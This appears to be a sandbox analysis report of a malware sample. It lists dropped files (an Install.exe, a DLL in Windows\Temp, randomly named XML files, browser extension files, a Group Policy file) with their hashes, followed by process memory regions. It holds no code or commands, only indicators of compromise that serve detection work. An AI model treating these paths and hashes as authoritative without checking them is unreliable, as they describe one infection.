                                                                                                          • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                            Filesize

                                                                                                            129B

                                                                                                            MD5

                                                                                                            a526b9e7c716b3489d8cc062fbce4005

                                                                                                            SHA1

                                                                                                            2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                            SHA256

                                                                                                            e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                            SHA512

                                                                                                            d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                          • C:\Program Files (x86)\GYmJCxEerPSU2\FYQPGZH.xml

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            8ed8b6c9306d6bf8373832e0ce3637bc

                                                                                                            SHA1

                                                                                                            6443f1ca481fbff93bbe46b4a1b905610ebd19a9

                                                                                                            SHA256

                                                                                                            0dff512a33c4e280cf10c8602ca3cbc75974d2d2fab4a1a2ab83cf3e40d8188e

                                                                                                            SHA512

                                                                                                            579ebf4102c72fde4e57281de896057c182e9b32af2d3c42654e07d8c86ce21eaf089f80eb56d15b2fed6813612f9905e33e0ea0828cc5a81d040dfe2093a7dd

                                                                                                          • C:\Program Files (x86)\loHBtvqqmsAxC\flatNLV.xml

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            190b89f5b2fbcb3bcfe0b2ac0a0a6083

                                                                                                            SHA1

                                                                                                            b74be040b993d51501343627e94d7f6d825e8e17

                                                                                                            SHA256

                                                                                                            cac47d4f3bf7bc936ba925a9990220cb159b377779661724cd9521ffc9c5af8f

                                                                                                            SHA512

                                                                                                            5241dbc8653380171796f104c249d6d2f4ccab19b38b785cae3a0417edac251abae5900f0bea4b537824d411c8cbacc429f0229426d873ea780e31a1374a9eb6

                                                                                                          • C:\Program Files (x86)\wmPxOgfbU\XPHVXjy.xml

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            97c1fe2a866fecb64b6ff6f4131abafc

                                                                                                            SHA1

                                                                                                            cad0f3da44b9ef80fae4dbe4c673aa9c77b21a63

                                                                                                            SHA256

                                                                                                            829e9ed80b5d3e4152e03fc4511fabff20b160daac72544cd4a7850518262da9

                                                                                                            SHA512

                                                                                                            cb895d603b632f12edf654fe29a245307856799ef61213eade565977313b3c5139c7336978f08d3f8a9c5c2bf60ec0e1f80f6fb584ddcf180fc9c32872c6062a

                                                                                                          • C:\Program Files (x86)\zWoVZpynlBkRPCWXAOR\UOpBSjA.xml

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            6e9c9c824f91960957ae7a8c83b1682f

                                                                                                            SHA1

                                                                                                            7571335d751c2cc0064d82e83d95095b25aeeee6

                                                                                                            SHA256

                                                                                                            46ed394f824815c8e40d17d81bda79a714930fe31ba635d3c247ada66b466376

                                                                                                            SHA512

                                                                                                            93b7343a47fba6bda92c5a7a83a884839f300c5e27c15e98838455d6a59e5fe786d9dd69e327f1909478e2b1e82f68f1f413045ad1979dbccc12b1731b9c17d2

                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                            Filesize

                                                                                                            2.0MB

                                                                                                            MD5

                                                                                                            c825af1d68fadd1fc752a502cf883b0e

                                                                                                            SHA1

                                                                                                            5f5b4333cb87f2f41b00fff623f89ad790e68db3

                                                                                                            SHA256

                                                                                                            fa556e74ff8457a144b89198465f16582d6f118f960e7db9a83d7d40ad2cb7ee

                                                                                                            SHA512

                                                                                                            a03d5a8db94da9870c1955f9244088252321ce5319442cd58310d1df1e0e27cc0245559c82d4c4247e1dce73fe206be09369eaf58e08a6aa16d4dda98a1bcb46

                                                                                                          • C:\ProgramData\RmigOdwjAYMpEGVB\XSOptqx.xml

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            76441feb91c274b10a4ed320cc739d29

                                                                                                            SHA1

                                                                                                            f1bb06150e0b34992832b694cde1aa305f1da267

                                                                                                            SHA256

                                                                                                            59ca3aab08125c407c539ac063741098cca2ef15cfa07f8916982f8461555682

                                                                                                            SHA512

                                                                                                            e923f3b08a11eebff1f3579a6fefde0a33f613ec080a04a1e514c114ff2dc5cad3bbb1769e4c95571c3e74a93822cad8ed8275c0d75a8b2fadcd3f8030d1e543

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                            Filesize

                                                                                                            187B

                                                                                                            MD5

                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                            SHA1

                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                            SHA256

                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                            SHA512

                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                            Filesize

                                                                                                            136B

                                                                                                            MD5

                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                            SHA1

                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                            SHA256

                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                            SHA512

                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                            Filesize

                                                                                                            150B

                                                                                                            MD5

                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                            SHA1

                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                            SHA256

                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                            SHA512

                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            e080d58e6387c9fd87434a502e1a902e

                                                                                                            SHA1

                                                                                                            ae76ce6a2a39d79226c343cfe4745d48c7c1a91a

                                                                                                            SHA256

                                                                                                            6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425

                                                                                                            SHA512

                                                                                                            6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json

                                                                                                            Filesize

                                                                                                            151B

                                                                                                            MD5

                                                                                                            bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                            SHA1

                                                                                                            9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                            SHA256

                                                                                                            b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                            SHA512

                                                                                                            3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            15KB

                                                                                                            MD5

                                                                                                            e8d50c23fd50ad45f377a819f4db84e7

                                                                                                            SHA1

                                                                                                            b0374c24a39b492c19cce198db3e20440f52fe87

                                                                                                            SHA256

                                                                                                            d16c4ea4371a2dfca05273ba70ea89cae22aa7d77e5f50e98a53aed32ca99511

                                                                                                            SHA512

                                                                                                            9631b2cc2e55c70d9cd728c7a42ce80408fbf129e863f60d6f3a6bdae66d2e9f91eb4ed4d3fdabdc8fbcda613840d19b7e4c8cbb322af43ea20682fa0a346356

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            11KB

                                                                                                            MD5

                                                                                                            cfc85627a22f5ca107ecde369de57461

                                                                                                            SHA1

                                                                                                            d54525810d4876a4503ed638d58472c53e03fbb4

                                                                                                            SHA256

                                                                                                            67da18e37305a1c47d7ea63b16d80330963bff7cce580647b9fd4bf947de1d4c

                                                                                                            SHA512

                                                                                                            96bec609e0728a7526d773dd25529c63389bb91a7b3064b3fad25f81a6cc030e5bb2757f11c747d7f4dce14458d15e558d3565ba445cf8555550564b865ffdfd

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSB1EB.tmp\Install.exe

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                            MD5

                                                                                                            234a64b2b32503ad9a53cb00678dc07d

                                                                                                            SHA1

                                                                                                            9555498d809d6fd16b47bca83f02663deba09bc8

                                                                                                            SHA256

                                                                                                            267f3f7e12b85c510b0fde7e8d451b73f9c7c0fcbab156195673c672125c1b7d

                                                                                                            SHA512

                                                                                                            5417c594448d9eaadc30f98ed7c22da1f5a3c33ecb46ce120a5764ebeac88c8ee49ee49005acc91f8342d3abf55cf095a52e7c6d4aa4e2a01a0c3dd197090acd

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_np4oy0yg.zh1.ps1

                                                                                                            Filesize

                                                                                                            60B

                                                                                                            MD5

                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                            SHA1

                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                            SHA256

                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                            SHA512

                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r5m741b5.default-release\prefs.js

                                                                                                            Filesize

                                                                                                            12KB

                                                                                                            MD5

                                                                                                            c534bcc235f427f6c8edfdae2168c73a

                                                                                                            SHA1

                                                                                                            746ca45181220c352ff3fa6b65ee449ad4d3eb3c

                                                                                                            SHA256

                                                                                                            833e5f02d837f36dcf61225a1a71d20bff4ae5767e8206c9014781275b051816

                                                                                                            SHA512

                                                                                                            51bd7281b2bc7dff01908d1ff0d681648ce9295cdc52d72df155492c08d03ae00b6253ad716ce0645f63dbe2aaf2261509e06cc437b04642d3e422d1f5a349a2

                                                                                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            11KB

                                                                                                            MD5

                                                                                                            cbf99f7cdafa22e3c1fbcee7cb96bc64

                                                                                                            SHA1

                                                                                                            55533470c0adb1b313b0052f6cc5367a3d725e95

                                                                                                            SHA256

                                                                                                            6d7f015f0d63a42322b2feab7db7cee491877babf9cfeea8eae99308aa63355e

                                                                                                            SHA512

                                                                                                            b3bf185ba82de24fee284a2eabac53248251df4ad6513090c53b19594ed82cadd70fb8600adba110f5237d104dba1f6c493ba6171ee8f4a4b8e5d2f685cb1e1c

                                                                                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            15KB

                                                                                                            MD5

                                                                                                            dfde033081ade05d2971aa77ac4e3b9c

                                                                                                            SHA1

                                                                                                            121ca29c9c92290935e78e834383c2cbd2732a9f

                                                                                                            SHA256

                                                                                                            a7fe9d294f611895a59db67d6bc80da176bb16f9e2d5d462a3e9e6607e149e05

                                                                                                            SHA512

                                                                                                            55271ff10c6eaf35c6a42c245c55d0debb7b11498cde143b1e1d5c31c3e2386b1c9893d64a48e8206f8c3853ca0c99533b0a52996337c2d62b95adaa01edc2d6

                                                                                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            15KB

                                                                                                            MD5

                                                                                                            43aea08d445468b7e98277d1bb04bb8e

                                                                                                            SHA1

                                                                                                            1c7d9245582be8ce9e0aca6da5a7c46b2308a8c9

                                                                                                            SHA256

                                                                                                            218b933d9f458f0a2c71541406895b924f7204f1713b35eb63073943c019b407

                                                                                                            SHA512

                                                                                                            3ff3c5cccd2f3893452c9f210a6772ec4da60e58482fff1dc1c35f61fb61a3f706098a6883cb37621f6f0a31095dc4b98090e427469e2ed360c733c47458a7b9

                                                                                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            11KB

                                                                                                            MD5

                                                                                                            0fd617e6a4b83f2a2a42f15b957f9425

                                                                                                            SHA1

                                                                                                            13cf26aa023fd245b9d93b1ac6e292953d366c8f

                                                                                                            SHA256

                                                                                                            4168091f69cf8958cb43faf766ad5a589d55ddbbeefa0fd10c119439c1577bf6

                                                                                                            SHA512

                                                                                                            a41ede5643edfa5ec0016e03602225b7d9066b4d98a2a3b36b05da950fcdd110f3b1cfab0faa2b231580df45785fdd9ca16bbd55e215169cc0ad81aad773eac2

                                                                                                          • C:\Windows\Temp\TRULmzvUdchjVCAU\LhaBxKIr\iRAZDtW.dll

                                                                                                            Filesize

                                                                                                            6.4MB

                                                                                                            MD5

                                                                                                            437fde0b68764b837db9bdded3128feb

                                                                                                            SHA1

                                                                                                            ab06f54fc51eaf069024cdc1cf1256a106e7eca5

                                                                                                            SHA256

                                                                                                            1ecf92488f1604577f0cc30bf8b2929911cc2e0d083ae7b289dc0f0f09df5349

                                                                                                            SHA512

                                                                                                            a1cc74c165cf07aeaddd4c86984fd4164aebb0417674006a3633a5d1f72beb0549f320bad6c0ca7fae844654ed57c442529fca66750e6e6e5649e6fd9869e866

                                                                                                          • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                            Filesize

                                                                                                            6KB

                                                                                                            MD5

                                                                                                            4112a33723b382db7a9588f6b91a0ba2

                                                                                                            SHA1

                                                                                                            72d6593bebeb795851b74196e6796d6100d1e5f3

                                                                                                            SHA256

                                                                                                            3fc75744d5cdeaa0e0e7b3a324d508837173e3eb50fc42511c408e6f9dc029d6

                                                                                                            SHA512

                                                                                                            e09e52f153c0dafc56e76fdc10141ac4692ea3353b0c82dfb759c3ce231bd60eadd2872d1f42a033319ec8bb0efd4c78ff6b75f3bb4d0c1a40d20735ffed61eb

                                                                                                          • memory/776-71-0x0000000004420000-0x0000000004777000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB

                                                                                                          • memory/1320-144-0x0000000004C90000-0x0000000004CDC000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/1320-134-0x00000000043C0000-0x0000000004717000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB

                                                                                                          • memory/1620-19-0x0000000005ED0000-0x0000000006227000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB

                                                                                                          • memory/1620-9-0x00000000055E0000-0x0000000005646000-memory.dmp

                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/1620-10-0x0000000005650000-0x00000000056B6000-memory.dmp

                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/1620-8-0x0000000005540000-0x0000000005562000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/1620-20-0x00000000063F0000-0x000000000640E000-memory.dmp

                                                                                                            Filesize

                                                                                                            120KB

                                                                                                          • memory/1620-21-0x0000000006430000-0x000000000647C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/1620-7-0x00000000056E0000-0x0000000005D0A000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.2MB

                                                                                                          • memory/1620-22-0x00000000073C0000-0x0000000007456000-memory.dmp

                                                                                                            Filesize

                                                                                                            600KB

                                                                                                          • memory/1620-23-0x00000000068C0000-0x00000000068DA000-memory.dmp

                                                                                                            Filesize

                                                                                                            104KB

                                                                                                          • memory/1620-24-0x0000000006910000-0x0000000006932000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/1620-6-0x0000000004F70000-0x0000000004FA6000-memory.dmp

                                                                                                            Filesize

                                                                                                            216KB

                                                                                                          • memory/1620-25-0x0000000007A10000-0x0000000007FB6000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.6MB

                                                                                                          • memory/1820-108-0x0000000000B70000-0x0000000001242000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                          • memory/1820-48-0x0000000000B70000-0x0000000001242000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                          • memory/1820-61-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.8MB

                                                                                                          • memory/2252-109-0x0000000000290000-0x0000000000962000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                          • memory/2252-188-0x00000000030F0000-0x0000000003157000-memory.dmp

                                                                                                            Filesize

                                                                                                            412KB

                                                                                                          • memory/2252-145-0x00000000028A0000-0x0000000002925000-memory.dmp

                                                                                                            Filesize

                                                                                                            532KB

                                                                                                          • memory/2252-519-0x0000000003A10000-0x0000000003A97000-memory.dmp

                                                                                                            Filesize

                                                                                                            540KB

                                                                                                          • memory/2252-560-0x0000000000290000-0x0000000000962000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                          • memory/2252-537-0x0000000003C00000-0x0000000003CD6000-memory.dmp

                                                                                                            Filesize

                                                                                                            856KB

                                                                                                          • memory/2252-122-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.8MB

                                                                                                          • memory/2308-28-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.8MB

                                                                                                          • memory/2308-5-0x0000000000B70000-0x0000000001242000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                          • memory/2308-46-0x0000000000B70000-0x0000000001242000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.8MB

                                                                                                          • memory/2700-533-0x00000000013C0000-0x0000000001991000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.8MB

                                                                                                          • memory/2852-118-0x0000000004770000-0x0000000004AC7000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB

                                                                                                          • memory/2852-120-0x0000000004D60000-0x0000000004DAC000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/3268-94-0x00000132E6600000-0x00000132E6622000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/3348-57-0x00000000041B0000-0x0000000004507000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB

                                                                                                          • memory/3348-58-0x00000000046A0000-0x00000000046EC000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/4220-43-0x0000000006D70000-0x0000000006DBC000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/4220-41-0x00000000063A0000-0x00000000066F7000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB